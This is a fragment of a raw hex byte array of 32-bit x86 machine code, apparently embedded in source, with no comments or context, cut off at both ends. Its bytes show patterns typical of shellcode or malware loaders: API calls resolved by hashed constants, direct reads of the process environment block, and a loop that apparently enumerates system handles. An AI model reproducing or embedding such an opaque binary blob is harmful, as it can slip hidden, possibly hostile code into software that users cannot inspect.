xD3,0xC3,0x90,0x0F,0x0B,0x68,0xE7,0x84,0xCD,0x0A,0xE8,0x03,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xAA,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x37,0x04,0x96,0x36,0xE8,0xE2,0xF8,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x89,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x79,0x5C,0x2D,0x7A,0xE8,0xC1,0xF8,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x68,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x8F,0xCC,0x1A,0xCA,0xE8,0xA0,0xF8,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x47,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x19,0xD6,0x26,0x0C,0xE8,0x7F,0xF8,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x26,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x90,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x44,0x24,0x08,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x48,0xE8,0x48,0x65,0xC7,0x04,0x24,0x00,0x00,0x00,0x00,0xE8,0xB8,0x01,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x18,0xC7,0x04,0x24,0x78,0xE8,0x48,0x65,0xE8,0x15,0xA3,0xFF,0xFF,0xC7,0x04,0x24,0xB3,0xE8,0x48,0x65,0xE8,0x09,0xA3,0xFF,0xFF,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x44,0x24,0x08,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xB8,0xE8,0x48,0x65,0xC7,0x04,0x24,0x00,0x00,0x00,0x00,0xE8,0x70,0x01,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x18,0xC7,0x04,0x24,0xDC,0xE8,0x48,0x65,0xE8,0xCD,0xA2,0xFF,0xFF,0xC7,0x04,0x24,0xB3,0xE8,0x48,0x65,0xE8,0xC1,0xA2,0xFF,0xFF,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x01,0x00,0x00,0xC0,0x83,0x7D,0x0C,0x00,0x74,0x06,0x83,0x7D,0x10,0x00,0x75,0x0A,0xB8,0x01,0x00,0x00,0x00,0xE9,0x17,0x01,0x00,0x00,0x8B,0x45,0x08,0x85,0xC0,0x75,0x2F,0xC7,0x45,0xF0,0x01,0x00,0x00,0x00,0x8D,0x45,0x08,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0x82,0xF8,0xFF,0xFF,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x88,0xC5,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xE9,0xA4,0x00,0x00,0x00,0x8B,0x45,0xEC,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x01,0xD0,0x8B,0x10,0x8B,0x45,0x08,0x8B,0x4D,0x14,0x89,0x4C,0x24,0x08,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xB0,0x00,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x3B,0x83,0x7D,0xF0,0x00,0x74,0x35,0x83,0x7D,0x14,0x00,0x74,0x2F,0x8B,0x45,0xEC,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x01,0xD0,0x8B,0x00,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x14,0xE9,0x48,0x65,0xE8,0xEC,0xA1,0xFF,0xFF,0xC7,0x04,0x24,0xB3,0xE8,0x48,0x65,0xE8,0xE0,0xA1,0xFF,0xFF,0xEB,0x4F,0x83,0x7D,0xF4,0x00,0x75,0x2F,0x8B,0x45,0xEC,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x01,0xD0,0x8B,0x00,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x43,0xE9,0x48,0x65,0xE8,0xB7,0xA1,0xFF,0xFF,0xC7,0x04,0x24,0xB3,0xE8,0x48,0x65,0xE8,0xAB,0xA1,0xFF,0xFF,0xEB,0x1A,0x83,0x45,0xEC,0x01,0x8B,0x45,0xEC,0x3B,0x45,0x10,0x0F,0x82,0x50,0xFF,0xFF,0xFF,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x83,0x7D,0xF0,0x00,0x74,0x12,0x8B,0x45,0x08,0x85,0xC0,0x74,0x0B,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x76,0xF7,0xFF,0xFF,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x81,0xEC,0x84,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x08,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x8B,0x45,0xCC,0x89,0x45,0xE4,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xAC,0x00,0x00,0x00,0x00,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0xC7,0x45,0xA4,0x00,0x00,0x00,0x00,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x60,0xE9,0x48,0x65,0xE8,0xD8,0xBF,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x1E,0xC1,0xA5,0x11,0x89,0x04,0x24,0xE8,0x47,0xBE,0xFF,0xFF,0x89,0x45,0xD4,0x83,0x7D,0xD4,0x00,0x0F,0x84,0x28,0x03,0x00,0x00,0x8B,0x45,0x08,0x85,0xC0,0x75,0x2F,0xC7,0x45,0xE8,0x01,0x00,0x00,0x00,0x8D,0x45,0x08,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0x86,0xF6,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x0F,0x88,0xF5,0x02,0x00,0x00,0x8B,0x45,0xCC,0x89,0x45,0xE4,0x8B,0x5D,0xCC,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xC2,0x02,0x00,0x00,0x8B,0x55,0xCC,0x8B,0x45,0x08,0x8D,0x4D,0xCC,0x89,0x4C,0x24,0x10,0x89,0x54,0x24,0x0C,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x03,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x2B,0xF8,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x79,0x59,0x83,0x7D,0xF0,0x00,0x74,0x44,0x8B,0x45,0xE4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xBE,0x31,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xE0,0x23,0x00,0x00,0xC0,0x0F,0x84,0x42,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xE0,0x00,0x0F,0x88,0x30,0x02,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xE9,0x0B,0x02,0x00,0x00,0x8B,0x4D,0xF0,0x8B,0x55,0xF4,0x89,0xD0,0x01,0xC0,0x01,0xD0,0xC1,0xE0,0x02,0x01,0xC8,0x8B,0x50,0x04,0x89,0x55,0xBC,0x8B,0x50,0x08,0x89,0x55,0xC0,0x8B,0x40,0x0C,0x89,0x45,0xC4,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8D,0x45,0xBC,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0xFF,0xD0,0x83,0xEC,0x10,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x85,0xCB,0x01,0x00,0x00,0xA1,0x34,0x61,0x49,0x65,0xFF,0xD0,0x83,0xF8,0x7A,0x0F,0x85,0xBB,0x01,0x00,0x00,0x8B,0x45,0xC8,0x83,0xC0,0x01,0x89,0x45,0xC8,0x8B,0x45,0xC8,0x8D,0x1C,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0x82,0x01,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x0C,0x8B,0x45,0xEC,0x89,0x44,0x24,0x08,0x8D,0x45,0xBC,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0xFF,0xD0,0x83,0xEC,0x10,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0x54,0x01,0x00,0x00,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0xEC,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0xBE,0x00,0x00,0x00,0xC7,0x45,0xD8,0x01,0x00,0x00,0x00,0xC7,0x45,0x98,0x01,0x00,0x00,0x00,0x8B,0x45,0xBC,0x8B,0x55,0xC0,0x89,0x45,0xA0,0x89,0x55,0xA4,0x8B,0x45,0xC4,0x89,0x45,0xA8,0x8B,0x45,0x08,0x8D,0x55,0xD0,0x89,0x54,0x24,0x08,0x8D,0x55,0x98,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x39,0xF9,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x79,0x0C,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xE9,0xEE,0x00,0x00,0x00,0x8B,0x45,0xD0,0x85,0xC0,0x75,0x66,0x83,0x7D,0x10,0x00,0x74,0x60,0xC7,0x45,0xAC,0x01,0x00,0x00,0x00,0x8B,0x45,0xBC,0x8B,0x55,0xC0,0x89,0x45,0xB0,0x89,0x55,0xB4,0xC7,0x45,0xB8,0x02,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x10,0x00,0x00,0x00,0x8D,0x55,0xAC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x69,0xF4,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x0F,0x88,0x87,0x00,0x00,0x00,0xC7,0x45,0xD0,0x01,0x00,0x00,0x00,0x90,0xEB,0x7E,0x83,0x7D,0xEC,0x00,0x74,0x4E,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xFA,0x2F,0x00,0x00,0x01,0xC0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x91,0x2F,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x83,0x45,0xF4,0x01,0x8B,0x45,0xF0,0x8B,0x00,0x39,0x45,0xF4,0x0F,0x82,0xE7,0xFD,0xFF,0xFF,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF0,0x00,0x74,0x4A,0x83,0x7D,0xF0,0x00,0x74,0x44,0x8B,0x45,0xCC,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x17,0x2F,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x74,0x54,0x83,0x7D,0xEC,0x00,0x74,0x4E,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x26,0x2F,0x00,0x00,0x01,0xC0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xBD,0x2E,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x83,0x7D,0xE8,0x00,0x74,0x12,0x8B,0x45,0x08,0x85,0xC0,0x74,0x0B,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x8E,0xF2,0xFF,0xFF,0x8B,0x45,0xD0,0x8B,0x5D,0xFC,0xC9,0xC3,0x90,0x90,0x90,0x55,0x89,0xE5,0x83,0xEC,0x28,0x8B,0x45,0x08,0x8B,0x40,0x04,0x89,0xC2,0x8B,0x45,0x0C,0x01,0xD0,0x89,0x45,0xF4,0x8B,0x45,0x14,0x89,0x44,0x24,0x08,0x8B,0x45,0x10,0x89,0x44,0x24,0x04,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x39,0x2E,0x00,0x00,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x8B,0x45,0x08,0x8B,0x50,0x08,0x8B,0x45,0x10,0x01,0xD0,0x89,0x45,0xF4,0x8B,0x45,0x08,0x8B,0x40,0x08,0x39,0x45,0xF4,0x73,0x1F,0xC7,0x04,0x24,0x7C,0xE9,0x48,0x65,0xE8,0x27,0x9C,0xFF,0xFF,0xC7,0x04,0x24,0xAC,0xE9,0x48,0x65,0xE8,0x1B,0x9C,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5B,0x8B,0x45,0x08,0x8B,0x40,0x0C,0x39,0x45,0xF4,0x72,0x1F,0xC7,0x04,0x24,0xB0,0xE9,0x48,0x65,0xE8,0xFD,0x9B,0xFF,0xFF,0xC7,0x04,0x24,0xAC,0xE9,0x48,0x65,0xE8,0xF1,0x9B,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x31,0x8B,0x45,0x08,0x8B,0x40,0x08,0x8B,0x55,0x10,0x89,0x54,0x24,0x0C,0x8B,0x55,0x0C,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x43,0xFF,0xFF,0xFF,0x8B,0x45,0x08,0x8B,0x55,0xF4,0x89,0x50,0x08,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x68,0xB9,0x00,0x00,0x00,0x00,0xB8,0x20,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD4,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0x8B,0x45,0x08,0x8B,0x40,0x10,0x89,0x45,0xD4,0x8B,0x45,0x08,0x0F,0xB7,0x40,0x14,0x66,0x89,0x45,0xD8,0x8B,0x45,0x08,0x0F,0xB7,0x40,0x16,0x66,0x89,0x45,0xDA,0xC7,0x45,0xDC,0x03,0x00,0x00,0x00,0xC7,0x45,0xE0,0x20,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xD4,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x0F,0xB7,0x45,0xD8,0x66,0x89,0x02,0x83,0x45,0xF4,0x02,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x0F,0xB7,0x45,0xDA,0x66,0x89,0x02,0x83,0x45,0xF4,0x02,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xDC,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xE0,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xE4,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xE8,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xEC,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xF0,0x89,0x02,0xC7,0x44,0x24,0x08,0x20,0x00,0x00,0x00,0x8D,0x45,0xB4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x05,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8D,0x55,0xE8,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0x0C,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xE8,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0x10,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xE8,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0x14,0x89,0x02,0xC7,0x44,0x24,0x08,0x0C,0x00,0x00,0x00,0x8D,0x45,0xE8,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x88,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x07,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0x8B,0x45,0xF4,0x89,0x44,0x24,0x0C,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x33,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAF,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x04,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0xE0,0x89,0x44,0x24,0x04,0x8B,0x45,0xE4,0x89,0x44,0x24,0x08,0x8B,0x45,0xE8,0x89,0x44,0x24,0x0C,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xDB,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5A,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x09,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0x89,0x44,0x24,0x04,0x8B,0x45,0xD8,0x89,0x44,0x24,0x08,0x8B,0x45,0xDC,0x89,0x44,0x24,0x0C,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x86,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0xC4,0x00,0x00,0x00,0x8D,0x55,0x9C,0xB8,0x00,0x00,0x00,0x00,0xB9,0x0E,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x45,0xD8,0x30,0x00,0x00,0x00,0x8B,0x45,0xD8,0x64,0x8B,0x00,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x05,0xA4,0x00,0x00,0x00,0x89,0x45,0xF0,0x8B,0x45,0xF4,0x05,0xA8,0x00,0x00,0x00,0x89,0x45,0xEC,0x8B,0x45,0xF4,0x05,0xAC,0x00,0x00,0x00,0x89,0x45,0xE8,0x8B,0x45,0xF4,0x05,0xB0,0x00,0x00,0x00,0x89,0x45,0xE4,0x8B,0x45,0xF4,0x05,0xF0,0x01,0x00,0x00,0x89,0x45,0xE0,0x66,0xC7,0x45,0x9C,0x00,0x00,0x66,0xC7,0x45,0x9E,0x00,0x00,0x66,0xC7,0x45,0xA0,0x00,0x00,0xC6,0x45,0xA2,0x00,0xC6,0x45,0xA3,0x01,0x8B,0x45,0xF0,0x8B,0x00,0x89,0x45,0xA4,0x8B,0x45,0xEC,0x8B,0x00,0x89,0x45,0xA8,0x8B,0x45,0xE8,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x45,0xAC,0x8B,0x45,0xE4,0x8B,0x00,0x89,0x45,0xB0,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xB8,0x00,0x00,0x66,0xC7,0x45,0xBA,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0x98,0x38,0x00,0x00,0x00,0xC7,0x85,0x60,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x64,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x68,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x6C,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x70,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x74,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x78,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x7C,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0x80,0x00,0x00,0x00,0x00,0xC7,0x45,0x84,0x00,0x00,0x00,0x00,0xC7,0x45,0x88,0x00,0x00,0x00,0x00,0xC7,0x45,0x8C,0x00,0x00,0x00,0x00,0xC7,0x45,0x90,0x00,0x00,0x00,0x00,0xC7,0x45,0x94,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB7,0x45,0x9C,0x66,0x89,0x02,0x83,0x45,0xDC,0x02,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB7,0x45,0x9E,0x66,0x89,0x02,0x83,0x45,0xDC,0x02,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB7,0x45,0xA0,0x66,0x89,0x02,0x83,0x45,0xDC,0x02,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB6,0x45,0xA2,0x88,0x02,0x83,0x45,0xDC,0x01,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB6,0x45,0xA3,0x88,0x02,0x83,0x45,0xDC,0x01,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xA4,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xA8,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xAC,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,